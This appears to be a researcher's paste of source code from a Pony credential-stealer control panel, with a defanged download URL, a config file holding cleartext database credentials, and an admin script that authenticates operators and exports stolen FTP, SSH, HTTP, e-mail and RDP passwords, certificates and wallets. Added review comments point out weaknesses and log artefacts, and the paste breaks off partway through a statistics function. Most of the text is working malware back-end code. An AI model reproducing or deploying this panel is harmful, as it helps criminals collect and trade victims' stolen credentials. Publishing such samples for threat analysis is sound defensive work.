Neonprimetime

2018-06-06 #pony panel php contents alhaini-kw[.]ltd

Jun 6th, 2018
  1. found by @neonprimetime security
  2. #pony panel zip file contents
  3.  
  4. hxxp://alhaini-kw[.]ltd/quzhou/coreserver.zip
  5.  
  6. -----------
  7.  
  8. <?php
  9.  
  // Panel configuration, kept exactly as recovered from the archive named in the page header.
  // Every value here is deployment-specific and is useful to an analyst as an indicator.

  // mysql settings
  // NOTE(review): the database account and password are stored in clear text in this file.
  $mysql_host = '127.0.0.1';
  $mysql_user = 'alhainik_av';
  $mysql_pass = 'working360#';
  $mysql_database = 'alhainik_av';

  $global_directory_slash = DIRECTORY_SEPARATOR;
  $global_temporary_directory = 'temp';

  // debug settings
  $global_verbose_log = false; // improved verbose log, use for debugging only!
  $global_allow_all_ftp = false; // disable filtering, set 'true' for testing purposes only!

  // Entries the panel filters out while $global_allow_all_ftp is false.
  // NOTE(review): the code that consumes this list is not part of this file; entries such as
  // '192.168.' and 'nonymous' suggest substring matching -- confirm against the includes.
  $global_filter_list = array(
      '127.0.0.1',
      '192.168.',
      'localhost',
      'nonymous',
      'bitshare.com',
      'depositfiles.com',
      'filesonic.com',
      'gigapeta.com',
      'hotfile.com',
      'ifolder.ru',
      'letitbit.net',
      'sms4file.com',
      'turbobit.ru',
      'uploadbox.com',
      'vip-file.com',
      'wupload.com',
  );

  // accept connections from white-list IPs only
  // The list is empty in this sample, so by the file's own rule white-list mode is off.
  $white_list = array(
      // add at least one IP to enable white-list mode
      //"127.0.0.1",
  );

  date_default_timezone_set('Europe/Moscow');
  // NOTE(review): the trailing comments on the $show_* flags describe what is hidden, while the
  // values are true. The admin script treats true as "page is available to non-admin accounts",
  // so the comments describe the effect of setting a flag to false.
  $enable_http_mode = true; // collect HTTP(s) passwords
  $show_help_to_users = true; // hide help for non admin accounts
  $show_http_to_users = true; // hide HTTP password page for non admin accounts
  $show_logons_to_users = true; // do not show IP logger for non admin accounts
  $disable_ip_logger = false; // disable IP logger
  $enable_email_mode = true; // collect E-mail passwords
  $show_email_to_users = true; // hide E-mail password page for non admin accounts
  $show_other_to_users = true; // hide Other password page for non admin accounts
  $use_mysql_persist_connections = false; // use mysql persist connections
  $show_domains = true; // hide ping domains page & functions
  $show_domains_to_users = true; // hide ping domains page for non admin accounts
  60.  
  61.  
  62.  
  63. -----------
  64. <?php
  65.  
  // Bootstrap of the panel's admin page: error/time-limit settings, session start, then the
  // configuration and helper includes are loaded with their output discarded.

  // show all errors
  error_reporting(E_ALL & ~E_DEPRECATED);
  @set_time_limit(0);
  @ini_set('max_execution_time', 0);
  // session cookie lifetime is 86400 seconds (one day)
  session_set_cookie_params(86400);
  session_start();

  // make sure included files do not generate extra output
  ob_start();

  // NOTE(review): $proxy_config is never assigned in this file, so it can only be set by a
  // script that defines it and then includes this one -- presumably a proxy wrapper; confirm.
  if (!isset($proxy_config))
  {
      // use local config file
      $config_file = "config.php";
  } else
  {
      // use proxy config file
      $config_file = $proxy_config;
  }

  // a missing config file ends the request with an empty response
  file_exists($config_file) or die();

  require_once($config_file);
  require_once("includes/lang.php");
  require_once("includes/misc.php");
  require_once("includes/password_modules.php");
  require_once("includes/database.php");

  // clean output buffer
  ob_end_clean();
  96.  
  // white list processing code
  // When $white_list holds at least one entry, a client whose address (as reported by
  // get_client_ip(), defined outside this file) is not an exact match gets a 404 response,
  // with the body of 404.html if that file exists.
  // NOTE(review): for anyone probing a suspected panel URL, a 404 from this script is therefore
  // not evidence that the panel is absent.
  if (isset($white_list) && is_array($white_list))
  {
      if (count($white_list) && array_search(get_client_ip(), $white_list, true) === false)
      {
          header("HTTP/1.0 404 Not Found");
          header("Status: 404 Not Found");
          $_SERVER['REDIRECT_STATUS'] = 404;
          if (file_exists('404.html'))
              echo file_get_contents('404.html');
          die();
      }
  }
  110.  
  // connect and validate database
  // pony_db is declared in one of the includes; the credentials come from the config file.
  $pony_db = new pony_db();
  $pony_db->connect_db($mysql_host, $mysql_user, $mysql_pass, $mysql_database, true);

  // set cookie name
  // cookie should be different for each script
  // The name is 'auth_cookie', or 'auth_cookie_' followed by $proxy_id when the including
  // script has defined $proxy_id.
  $config_cookie_name = 'auth_cookie';
  if (isset($proxy_id))
  {
      $config_cookie_name = 'auth_cookie_'.$proxy_id;
  }

  // set report decryption password
  // Read from the options table; REPORT_DEFAULT_PASSWORD (defined elsewhere) is passed as the
  // third argument -- presumably the fallback when the option is unset.
  $pony_db_report_password = $pony_db->get_option('report_password', '', REPORT_DEFAULT_PASSWORD);
  // set report parsing options
  $pony_report_options = array('sftp_user' => $pony_db->get_option('sftp_user', '', '1'),
      'sftp_port' => $pony_db->get_option('sftp_port', '', '1'),
      'sftp_protocol' => $pony_db->get_option('sftp_protocol', '', '1'));

  // default values for unset config variables
  // These apply only when the config file leaves a flag undefined. Note that the collection
  // modes and $show_domains default to false here, while the $show_*_to_users flags default to true.
  if (!isset($show_help_to_users))
      $show_help_to_users = true;
  if (!isset($show_http_to_users))
      $show_http_to_users = true;
  if (!isset($show_logons_to_users))
      $show_logons_to_users = true;
  if (!isset($show_other_to_users))
      $show_other_to_users = true;
  if (!isset($enable_http_mode))
      $enable_http_mode = false;
  if (!isset($disable_ip_logger))
      $disable_ip_logger = false;
  if (!isset($enable_email_mode))
      $enable_email_mode = false;
  if (!isset($show_email_to_users))
      $show_email_to_users = true;
  if (!isset($show_domains))
      $show_domains = false;
  if (!isset($show_domains_to_users))
      $show_domains_to_users = true;
  151.  
  // initialize CSRF token
  // One token per session: created on the first request and reused afterwards.
  // NOTE(review): the value is md5() over uniqid() seeded with rand(); both inputs are
  // time/PRNG based rather than drawn from a cryptographic random source.
  if (!isset($_SESSION['token']))
  {
      $token = md5(uniqid(rand(), TRUE));
      $_SESSION['token'] = $token;
  }
  else
  {
      $token = $_SESSION['token'];
  }

  // initialize smarty
  // The bundled template engine is loaded from includes/Smarty-3.1.15/libs/ under the current
  // working directory (backslashes normalised to forward slashes).
  define('SMARTY_DIR', str_replace("\\", "/", getcwd()).'/includes/Smarty-3.1.15/libs/');
  require_once(SMARTY_DIR . 'Smarty.class.php');
  require_once(SMARTY_DIR . 'SmartyPaginate.class.php');
  /**
   * Variable filter registered with Smarty: HTML-escapes a value before it is rendered.
   *
   * Both single and double quotes are converted (ENT_QUOTES) and the input is interpreted
   * as Windows-1251 text.
   *
   * @param string $content value about to be written into a template
   * @return string the HTML-escaped value
   */
  function escFilter($content)
  {
      $quote_flags = ENT_QUOTES;
      $source_charset = 'cp1251';

      $escaped = htmlspecialchars($content, $quote_flags, $source_charset);

      return $escaped;
  }
  // Template engine set-up. Cache and compile output both go to the temporary directory named
  // in the config file; templates are read from includes/templates/.
  $smarty = new Smarty();
  $smarty->setCacheDir($global_temporary_directory.'/');
  $smarty->setCompileDir($global_temporary_directory.'/');
  $smarty->setTemplateDir('includes/templates/');
  // every template variable passes through escFilter (HTML escaping) before output
  $smarty->registerFilter('variable', 'escFilter');
  $smarty->loadFilter('output', 'trimwhitespace');
  $smarty->caching = false;
  // expose the visibility/feature flags and the session CSRF token to the templates
  $smarty->assign('show_help_to_users', $show_help_to_users);
  $smarty->assign('show_http_to_users', $show_http_to_users);
  $smarty->assign('show_logons_to_users', $show_logons_to_users);
  $smarty->assign('show_other_to_users', $show_other_to_users);
  $smarty->assign('enable_http_mode', $enable_http_mode);
  $smarty->assign('disable_ip_logger', $disable_ip_logger);
  $smarty->assign('enable_email_mode', $enable_email_mode);
  $smarty->assign('show_email_to_users', $show_email_to_users);
  $smarty->assign('show_domains', $show_domains);
  $smarty->assign('show_domains_to_users', $show_domains_to_users);
  $smarty->assign('token', $token);
  189.  
  // initialize common used variables
  // All request input is read through assign(), a helper defined outside this file
  // (presumably it returns an empty value when the key is missing -- confirm in misc.php).
  // The parameter names read here (login, password, save_password, action, routine, zip,
  // token) are what this script's requests look like in web-server logs.
  $self_file = $_SERVER['SCRIPT_NAME'];
  $authentication_login = trim(assign($_REQUEST['login']));
  $authentication_password = trim(assign($_REQUEST['password']));
  $authentication_success = false;
  $authentication_attempt = isset($_REQUEST['login']) && isset($_REQUEST['password']);
  $authentication_save_password = trim(assign($_REQUEST['save_password']));
  $admin_action = trim(assign($_REQUEST['action']));
  $auth_cookie = trim(assign($_COOKIE[$config_cookie_name]));
  $admin_routine = trim(assign($_REQUEST['routine']));
  $use_zip = trim(assign($_REQUEST['zip'])) == '1';

  // filter available action pages
  // any action outside this fixed list is reset to the empty string
  if (array_search($admin_action, array('ftp', 'http', 'stats', 'ping', 'log', 'admin', 'exit', 'help', 'chart', 'reports', 'other')) === false)
  {
      $admin_action = '';
  }

  // authentication
  // NOTE(review): this block repeats the three assignments made above from the same request
  // fields; it consults no additional source.
  if (!$authentication_attempt)
  {
      $authentication_login = trim(assign($_REQUEST['login']));
      $authentication_password = trim(assign($_REQUEST['password']));
      $authentication_attempt = isset($_REQUEST['login']) && isset($_REQUEST['password']);
  }
  215.  
  // try to authenticate
  // Order of checks: submitted login/password first, then the authentication cookie.
  // The credential check itself lives in pony_db::authenticate(), outside this file.
  if (strlen($authentication_login) && strlen($authentication_password) && $pony_db->authenticate($authentication_login, $authentication_password))
  {
      $authentication_success = true;

      // set cookie on successful authentication
      $cookie_save_password = $authentication_save_password;
      if ($cookie_save_password)
          $cookie_exp_time = time()+60*60*24*60; // 2 months
      else
          $cookie_exp_time = 0; // 0 = cookie lasts for the browser session only

      // NOTE(review): only name, value and expiry are passed, so no path, Secure or HttpOnly
      // attribute is set on the authentication cookie.
      setcookie($config_cookie_name, $pony_db->auth_cookie, $cookie_exp_time);
  } else
  {
      // authentication failed
      // try to authenticate using cookie
      if ($auth_cookie)
      {
          // the method name is spelled "autneticate_cookie" in the database class
          $authentication_success = $pony_db->autneticate_cookie($auth_cookie);
          if ($authentication_success)
              $authentication_login = $pony_db->login;
      }
  }
  240.  
  // ajax ping code
  // should be displayed before authorization form
  // Runs only for an authenticated session whose request token matches the session token,
  // and only when the domains page is enabled and the account is allowed to see it.
  // The response is a bare <span> fragment, and the stored domain status is updated to OK/FAIL.
  if ($admin_routine == 'ping' && $admin_action == 'ping' && $authentication_success && $token === assign($_REQUEST['token']) && ($show_domains && ($pony_db->priv_is_admin() || $show_domains_to_users)))
  {
      $domain_id = trim(assign($_REQUEST['domain_id']));
      $find_domain_result = $pony_db->find_domain($domain_id);

      // a usable lookup result is a three-element array: url, time, status
      if (is_array($find_domain_result) && $find_domain_result && count($find_domain_result) == 3)
      {
          list($ping_url, $ping_time, $ping_status) = $find_domain_result;

          // curl_ping() is defined outside this file; it issues the outbound check
          if (curl_ping($ping_url))
          {
              $pony_db->update_domain($domain_id, 'OK');
              die("<span class=\"check\"></span>");
          }
      }
      // unknown domain id or failed check
      $pony_db->update_domain($domain_id, 'FAIL');
      die("<span class=\"cross\"></span>");
  }

  // chart rendering is delegated to includes/chart.php under the same authentication and
  // token conditions
  if ($admin_action == 'chart' && strlen($admin_routine) && $authentication_success && $token === assign($_REQUEST['token']))
  {
      require_once('includes/chart.php');
      die();
  }

  // these variables available can be set after authentication only
  $smarty->assign('priv_is_admin', $pony_db->priv_is_admin());
  $smarty->assign('priv_can_delete', $pony_db->priv_can_delete());
  $smarty->assign('authentication_success', $authentication_success);
  272.  
  /**
   * Builds the continent => country list used by the country filter form and hands it to
   * the template engine as 'geo_continents'.
   *
   * Entries with an empty country name are skipped. The first time a continent code is
   * seen, an '(all)' / 'all' pseudo-entry is inserted ahead of its first country. The
   * numeric slot index is a single counter shared by all continents, so indexes inside
   * one continent are not guaranteed to start at zero.
   *
   * @param object $smarty template engine instance; only assign() is called on it
   * @return void
   */
  function smarty_assign_continents($smarty)
  {
      $geo = new GeoIP();
      $by_continent = array();
      $slot = 0;
      $entries = count($geo->GEOIP_CONTINENT_CODES);

      for ($idx = 0; $idx < $entries; $idx++)
      {
          // rows without a country name are placeholders and are not listed
          if (!strlen($geo->GEOIP_COUNTRY_NAMES[$idx]))
          {
              continue;
          }

          $continent = $geo->GEOIP_CONTINENT_CODES[$idx];

          if (!isset($by_continent[$continent]))
          {
              // first country of this continent: prepend the select-all entry
              $by_continent[$continent][$slot++] = array('name' => '(all)', 'code' => 'all');
          }

          $by_continent[$continent][$slot++] = array(
              'name' => $geo->GEOIP_COUNTRY_NAMES[$idx],
              'code' => $geo->GEOIP_COUNTRY_CODES[$idx],
          );
      }

      $smarty->assign('geo_continents', $by_continent);
  }
  296.  
  // Reads the filter form fields from the request, runs the matching list query and either
  // streams the result (download) or assigns a preview to the templates.
  //
  // $smarty      - template engine; receives 'filtered_items_count' and 'filtered_items_list'
  // $do_download - passed through to the list query; the callers in this script wrap the call
  //                in output buffering when it is true, so the query presumably prints the list
  // $mode        - 'ftp' queries get_ftp_list(); any other value queries get_http_list()
  //
  // Uses the global $pony_db connection and reads $_REQUEST directly. Returns nothing.
  function apply_data_filters($smarty, $do_download, $mode = 'ftp')
  {
      global $pony_db;

      $filter_include_ftp = trim(assign($_REQUEST['filter_include_ftp']));
      $filter_include_ssh = trim(assign($_REQUEST['filter_include_ssh']));

      $filter_include_http = trim(assign($_REQUEST['filter_include_http']));
      $filter_include_https = trim(assign($_REQUEST['filter_include_https']));

      // normalised to '1' or ''
      $filter_trim_dirs = trim(assign($_REQUEST['filter_trim_dirs']));
      if ($filter_trim_dirs != '1')
          $filter_trim_dirs = '';

      // Sub-type selection. 'both' requires both boxes to equal '1'; the second test only
      // checks truthiness. The fall-through default is 'ftp' in ftp mode and 'https' otherwise.
      if ($mode == 'ftp')
      {
          // include ftp/ssh
          if ($filter_include_ftp == '1' && $filter_include_ssh == '1')
              $include_subtypes = 'both';
          else if ($filter_include_ssh)
              $include_subtypes = 'ssh';
          else
              $include_subtypes = 'ftp';
      } else
      {
          // include http/https
          if ($filter_include_http == '1' && $filter_include_https == '1')
              $include_subtypes = 'both';
          else if ($filter_include_http)
              $include_subtypes = 'http';
          else
              $include_subtypes = 'https';
      }

      // include domains
      $include_domains = trim(assign($_REQUEST['filter_domains_include']));

      // exclude domains
      $exclude_domains = trim(assign($_REQUEST['filter_domains_exclude']));

      // text substring
      $filter_text = trim(assign($_REQUEST['filter_text']));

      // date filter
      $filter_date_from = trim(assign($_REQUEST['filter_date_from']));
      $filter_date_to = trim(assign($_REQUEST['filter_date_to']));

      // export ip setting
      // normalised to '1' or ''
      $filter_export_ip = trim(assign($_REQUEST['filter_export_ip']));
      if ($filter_export_ip != '1')
          $filter_export_ip = '';

      // country filter
      // Selected countries arrive as one array per continent, in fields named
      // country_<lower-cased continent code>; the 'all' pseudo-entry is ignored.
      $filter_country = array();
      $geo_ip = new GeoIP();

      foreach ($geo_ip->GEOIP_CONTINENT_CODES as $continent_code)
      {
          if (isset($_REQUEST['country_'.strtolower($continent_code)]) && is_array($_REQUEST['country_'.strtolower($continent_code)]))
          {
              foreach ($_REQUEST['country_'.strtolower($continent_code)] as $country_code)
              {
                  if (strlen(trim($country_code)) && $country_code != 'all')
                  {
                      $filter_country[trim($country_code)] = 1;
                  }
              }
          }
      }

      // when all countries are marked, do not apply country exclude filter
      if (count($filter_country) == count($geo_ip->GEOIP_COUNTRY_CODES)-1)
      {
          $filter_country = array();
      }

      // the query runs only when at least one filter field carries a value
      $ftp_list = array();
      if (strlen($filter_include_ftp) || strlen($filter_include_ssh) || strlen($filter_trim_dirs) || strlen($filter_include_http) || strlen($filter_include_https) || count($filter_country) || strlen($include_domains) || strlen($exclude_domains) || strlen($filter_date_from) || strlen($filter_date_to) ||
          strlen($filter_text) || strlen($filter_export_ip))
      {
          // NOTE(review): the filter values are handed to the database class as-is; whether they
          // are escaped before reaching SQL is decided in get_ftp_list()/get_http_list(), which
          // are not part of this file.
          if ($mode == 'ftp')
          {
              $filtered_items = $pony_db->get_ftp_list($do_download, $ftp_list, 0, $include_subtypes, 0, $filter_date_from, $filter_date_to, $filter_country, $include_domains, $exclude_domains, $filter_trim_dirs, !$do_download, $filter_text, $filter_export_ip);
          }
          else
          {
              $filtered_items = $pony_db->get_http_list($do_download, $ftp_list, 0, $include_subtypes, 0, $filter_date_from, $filter_date_to, $filter_country, $include_domains, $exclude_domains, $filter_trim_dirs, !$do_download, $filter_text, $filter_export_ip);
          }

          // filter preview
          if ($filtered_items !== false && isset($filtered_items['list']) && isset($filtered_items['count']))
          {
              if (is_array($filtered_items['list']))
              {
                  // blank out report ids whose report no longer exists
                  foreach ($filtered_items['list'] as $ftp_item=>$ftp_value)
                  {
                      if (!$pony_db->report_id_exists($filtered_items['list'][$ftp_item]['report_id']))
                      {
                          $filtered_items['list'][$ftp_item]['report_id'] = '';
                      }
                  }
              }

              $smarty->assign('filtered_items_count', $filtered_items['count']);
              $smarty->assign('filtered_items_list', $filtered_items['list']);
          }
      }
  }
  405.  
  // Outcome of the authentication step: log a successful login, show the login form when no
  // attempt was made, or show an error after a failed attempt.
  if ($authentication_success)
  {
      // successfull authentication

      // log it
      // Only requests that carried login and password fields are logged; cookie-based
      // re-authentication is not. The logged address comes from get_client_ip().
      if ($authentication_attempt)
      {
          if (!$disable_ip_logger)
          {
              $pony_db->add_log_line(get_client_ip(), CLOG_SOURCE_LOGIN, null, $authentication_login);
          }
      }
  } else if (!$authentication_attempt)
  {
      // didn't try to authenticate the user
      // show authentication form
      $smarty->display('header.tpl');
      $smarty->display('login_form.tpl');
      $smarty->display('footer.tpl');
      die();
  } else
  {
      // tried to authenticate the user, but failed
      // show error message
      // NOTE(review): no log line is written on this path, and execution continues to the
      // checks that follow instead of stopping here.
      $smarty->display('header.tpl');
      show_smarty_error($smarty, 'ERR_WRONG_PASSWORD', '');
      $smarty->display('footer.tpl');
  }
  434.  
  // Token enforcement and logout. A request with neither action nor routine from an
  // authenticated session passes through untouched. Any other request must carry a 'token'
  // field identical to the session token; if it does not, or if the action is 'exit', the
  // authentication cookie and the session are destroyed and the client is redirected.
  if ($admin_action == '' && $admin_routine == '' && $authentication_success)
  {
      // workaround for saved password autologin
  } else if ($admin_action == 'exit' || $token !== assign($_REQUEST['token']))
  {
      // an expiry of 1 (one second after the epoch) makes the browser drop the cookie
      $cookie_exp_time = 1;
      $pony_db->remove_auth_cookie($auth_cookie);
      setcookie($config_cookie_name, '', $cookie_exp_time);

      // destroy session
      $_SESSION = array();

      if (ini_get("session.use_cookies")) {
          $params = session_get_cookie_params();
          setcookie(session_name(), '', time() - 42000,
              $params["path"], $params["domain"],
              $params["secure"], $params["httponly"]
          );
      }

      // redirect to authentication page
      header('Location: '.$self_file);

      session_destroy();
      die();
  }

  // Final gate: everything below this point runs for authenticated sessions only.
  if (!$authentication_success)
  {
      // authentication failed, stop script execution
      die();
  }
  467.  
  /**
   * Sends the response headers shared by every export: caching disabled, the given content
   * type, and an attachment disposition carrying the given file name.
   *
   * The file name is placed between double quotes without escaping; every caller in this
   * script passes a fixed name or one built from an integer.
   *
   * @param string $file_name    name offered to the browser for the downloaded file
   * @param string $content_type MIME type of the body that follows
   * @return void
   */
  function set_common_file_download_header($file_name = '', $content_type = 'text/plain')
  {
      // each entry: header line, then whether it replaces an earlier header of the same name
      $header_lines = array(
          array("Pragma: public", true),
          array("Expires: 0", true),
          array("Pragma: no-cache", true),
          array("Cache-Control: no-store, no-cache, must-revalidate", true),
          array("Cache-Control: post-check=0, pre-check=0", false),
          array("Cache-Control: private", false),
          array("Content-Type: $content_type", true),
          array("Content-Transfer-Encoding: binary", true),
          array("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT", true),
          array('Content-Disposition: attachment; filename="'.$file_name.'";', true),
      );

      foreach ($header_lines as $entry)
      {
          header($entry[0], $entry[1]);
      }
  }
  481.  
  // Export handlers for the stored credential lists. All of them sit behind the
  // authentication gate and the token check earlier in this script. Each follows the same
  // pattern: send download headers, let the database class print the list, and when zip=1 was
  // requested capture that output and hand it to create_zip_and_send() (defined elsewhere).
  // The fixed attachment names (ftp_list.txt, ssh_list.txt, http_list.txt, email_list.txt,
  // email_smtp_list.txt and their .zip forms) are recognisable artefacts in proxy logs and on
  // disk.

  // FTP list
  if ($admin_routine == 'download_ftp' && $admin_action == 'ftp')
  {
      if ($use_zip)
      {
          set_common_file_download_header('ftp_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_ftp_list(true);
          $ftp_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('ftp_list.txt', $ftp_list_data);
      } else
      {
          set_common_file_download_header('ftp_list.txt');
          $pony_db->get_ftp_list(true);
      }
      die();
  }
  // SSH list (same query restricted to the 'ssh' sub-type)
  if ($admin_routine == 'download_ssh' && $admin_action == 'ftp')
  {
      if ($use_zip)
      {
          set_common_file_download_header('ssh_list.zip', 'application/zip');
          ob_start();
          $null_array = array();
          $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
          $ssh_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('ssh_list.txt', $ssh_list_data);
      } else
      {
          set_common_file_download_header('ssh_list.txt');
          $null_array = array();
          $pony_db->get_ftp_list(true, $null_array, 0, 'ssh');
      }
      die();
  }
  // HTTP list: requires HTTP mode, and either the page being visible to users or an admin account
  if ($admin_routine == 'download_http' && $admin_action == 'http' && $enable_http_mode && ($show_http_to_users || $pony_db->priv_is_admin()))
  {
      if ($use_zip)
      {
          set_common_file_download_header('http_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_http_list(true);
          $http_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('http_list.txt', $http_list_data);
      } else
      {
          set_common_file_download_header('http_list.txt');
          $pony_db->get_http_list(true);
      }
      die();
  }
  // E-mail list: gated on e-mail mode and visibility, but not on a particular action value
  if ($admin_routine == 'download_email' && $enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
  {
      if ($use_zip)
      {
          set_common_file_download_header('email_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_email_list(true);
          $email_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('email_list.txt', $email_list_data);
      } else
      {
          set_common_file_download_header('email_list.txt');
          $pony_db->get_email_list(true);
      }
      die();
  }
  // E-mail list restricted to the 'smtp' protocol
  if ($admin_routine == 'download_email_smtp' && $enable_email_mode && ($show_email_to_users || $pony_db->priv_is_admin()))
  {
      if ($use_zip)
      {
          set_common_file_download_header('email_smtp_list.zip', 'application/zip');
          ob_start();
          $null_list = array();
          $pony_db->get_email_list(true, $null_list, 0, 'smtp');
          $email_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('email_smtp_list.txt', $email_list_data);
      } else
      {
          set_common_file_download_header('email_smtp_list.txt');
          // NOTE(review): $null_list is assigned only in the zip branch above; on this path it
          // has no value in the visible code when it is passed to get_email_list().
          $pony_db->get_email_list(true, $null_list, 0, 'smtp');
      }
      die();
  }
  // Export handlers for RDP entries, raw reports and the panel log. These also run only after
  // the authentication gate and token check earlier in this script.

  // RDP list
  // NOTE(review): unlike the HTTP and e-mail exports, this handler checks neither the action
  // value nor any visibility/privilege flag.
  if ($admin_routine == 'download_rdp')
  {
      if ($use_zip)
      {
          set_common_file_download_header('rdp_list.zip', 'application/zip');
          ob_start();
          $pony_db->get_rdp_list(true);
          $rdp_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('rdp_list.txt', $rdp_list_data);
      } else
      {
          set_common_file_download_header('rdp_list.txt');
          $pony_db->get_rdp_list(true);
      }
      die();
  }
  // all reports, exported as reports.sql
  if ($admin_routine == 'download_reports' && $admin_action == 'ftp')
  {
      set_common_file_download_header('reports.sql');
      $pony_db->export_reports(false);
      die();
  }

  // reports that have not been parsed yet, exported as non_parsed_reports.sql
  if ($admin_routine == 'download_nonparsed_reports' && $admin_action == 'ftp')
  {
      set_common_file_download_header('non_parsed_reports.sql');
      $pony_db->export_reports(true);
      die();
  }

  // panel log
  if ($admin_routine == 'download_log' && $admin_action == 'log')
  {
      if ($use_zip)
      {
          set_common_file_download_header('log.zip', 'application/zip');
          ob_start();
          $null_list = array();
          $pony_db->get_log_list($null_list, 0, 0, true);
          $log_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('log.txt', $log_list_data);
      } else
      {
          set_common_file_download_header('log.txt');
          $null_list = array();
          $pony_db->get_log_list($null_list, 0, 0, true);
      }
      die();
  }

  // single raw report, served as report_<id>.bin
  if ($admin_routine == 'download_report' && $admin_action == 'reports')
  {
      $report_id = trim(assign($_REQUEST['report_id']));
      $report_item_result = $pony_db->get_report_item($report_id);
      if ($pony_db->state && is_array($report_item_result))
      {
          // the id is forced through intval() before it becomes part of the file name; the
          // lookup above receives the trimmed request value unchanged
          set_common_file_download_header('report_'.strval(intval($report_id)).'.bin', 'application/octet-stream');
          header("Content-Length: ".strlen($report_item_result['data']));
          echo $report_item_result['data'];
      } else
          die('Report not found!');
      die();
  }
  // Filtered exports and the certificate / wallet archives, followed by the start of normal
  // page rendering for requests that matched none of the export routines.

  // filtered FTP/SSH list: apply_data_filters() prints the list when its second argument is true
  if ($admin_routine == 'filter_download' && $admin_action == 'ftp')
  {
      if ($use_zip)
      {
          set_common_file_download_header('filtered_list.zip', 'application/zip');
          ob_start();
          apply_data_filters($smarty, true);
          $filter_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('filtered_list.txt', $filter_list_data);
      } else
      {
          set_common_file_download_header('filtered_list.txt');
          apply_data_filters($smarty, true);
      }
      die();
  }
  // filtered HTTP/HTTPS list
  // NOTE(review): this path does not repeat the $enable_http_mode / $show_http_to_users
  // checks that guard the unfiltered HTTP export.
  if ($admin_routine == 'filter_download' && $admin_action == 'http')
  {
      if ($use_zip)
      {
          set_common_file_download_header('filtered_http_list.zip', 'application/zip');
          ob_start();
          apply_data_filters($smarty, true, 'http');
          $filter_list_data = ob_get_contents();
          ob_end_clean();
          create_zip_and_send('filtered_http_list.txt', $filter_list_data);
      } else
      {
          set_common_file_download_header('filtered_http_list.txt');
          apply_data_filters($smarty, true, 'http');
      }
      die();
  }
  // stored certificates, always delivered as certificates.zip
  if ($admin_routine == 'download_cert' && $admin_action == 'other')
  {
      set_common_file_download_header('certificates.zip', 'application/zip');

      $pony_db->get_cert_zip();

      die();
  }
  // stored wallet files, always delivered as wallets.zip
  if ($admin_routine == 'download_wallet' && $admin_action == 'other')
  {
      set_common_file_download_header('wallets.zip', 'application/zip');

      $pony_db->get_wallet_zip();

      die();
  }


  // no export routine matched: start rendering the regular page
  $smarty->display('header.tpl');

  // my_flush() is defined outside this file; presumably it pushes the header to the client
  my_flush();
  689.  
  /**
   * Resets every cached statistics offset by storing a single empty string under each of
   * the twelve option names, in a fixed order.
   *
   * @param object $pony_db database wrapper; only set_multi_option() is called on it
   * @return void
   */
  function clear_floating_offsets($pony_db)
  {
      $option_names = array(
          'offset_url',
          'offset_ftp_last',
          'offset_http_last',
          'offset_reports_last',
          'offset_ftp_list',
          'offset_http_list',
          'data_sum',
          'offset_nonparsed_reports_stats',
          'offset_nonparsed_reports_sum',
          'offset_log_events_count',
          'offset_report_duplicates',
          'offset_email_list',
      );

      $remaining = count($option_names);
      for ($pos = 0; $pos < $remaining; $pos++)
      {
          $pony_db->set_multi_option($option_names[$pos], array(''));
      }
  }
  701.  
  702. function smarty_assign_common_vars($smarty, $pony_db)
  703. {
  704. $pony_db->lock_all_tables();
  705. $offset_url = $pony_db->get_multi_option('offset_url', 6);
  706.  
  707. $url_password_stats = array();
  708. $pony_db->get_url_password_stats($url_password_stats, $offset_url[0]);
  709. if (!isset($url_password_stats['ftp']))
  710. $url_password_stats['ftp'] = '0';
  711. if (!isset($url_password_stats['ssh']))
  712. $url_password_stats['ssh'] = '0';
  713. if (!isset($url_password_stats['http']))
  714. $url_password_stats['http'] = '0';
  715. if (!isset($url_password_stats['https']))
  716. $url_password_stats['https'] = '0';
  717. if (!isset($url_password_stats['rdp']))
  718. $url_password_stats['rdp'] = '0';
  719.  
  720. $url_password_stats['ftp'] += $offset_url[1];
  721. $url_password_stats['ssh'] += $offset_url[2];
  722. $url_password_stats['http'] += $offset_url[3];
  723. $url_password_stats['https'] += $offset_url[4];
  724. $url_password_stats['rdp'] += $offset_url[5];
  725.  
  726. $pony_db->set_multi_option('offset_url',
  727. array(
  728. $pony_db->get_auto_value(CPONY_FTP_TABLE),
  729. $url_password_stats['ftp'],
  730. $url_password_stats['ssh'],
  731. $url_password_stats['http'],
  732. $url_password_stats['https'],
  733. $url_password_stats['rdp']
  734. )
  735. );
  736.  
  737. $smarty->assign('total_ftp_items_count', $url_password_stats['ftp']);
  738. $smarty->assign('total_http_items_count', strval(intval($url_password_stats['http']) + intval($url_password_stats['https'])));
  739. $smarty->assign('total_cert_items_count', $pony_db->get_table_row_count(CPONY_CERT_TABLE));
  740. $smarty->assign('total_wallet_items_count', $pony_db->get_table_row_count(CPONY_WALLET_TABLE));
  741. $smarty->assign('total_email_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE));
  742. $smarty->assign('total_email_smtp_items_count', $pony_db->get_table_row_count(CPONY_EMAIL_TABLE, "WHERE protocol='smtp'"));
  743. $smarty->assign('total_ssh_items_count', $url_password_stats['ssh']);
  744. $smarty->assign('total_rdp_items_count', $url_password_stats['rdp']);
  745. $smarty->assign('total_reports_count', $pony_db->get_table_row_count(CPONY_REPORT_TABLE));
  746.  
  747. $report_sum = $pony_db->get_multi_option('data_sum', 2);
  748. $total_reports_size = $report_sum[1] + $pony_db->get_report_sum('', $report_sum[0]);
  749.  
  750. $pony_db->set_multi_option('data_sum',
  751. array(
  752. $pony_db->get_auto_value(CPONY_REPORT_DATA_TABLE),
  753. $total_reports_size,
  754. )
  755. );
  756.  
  757. $smarty->assign('total_reports_size', $total_reports_size);
  758.  
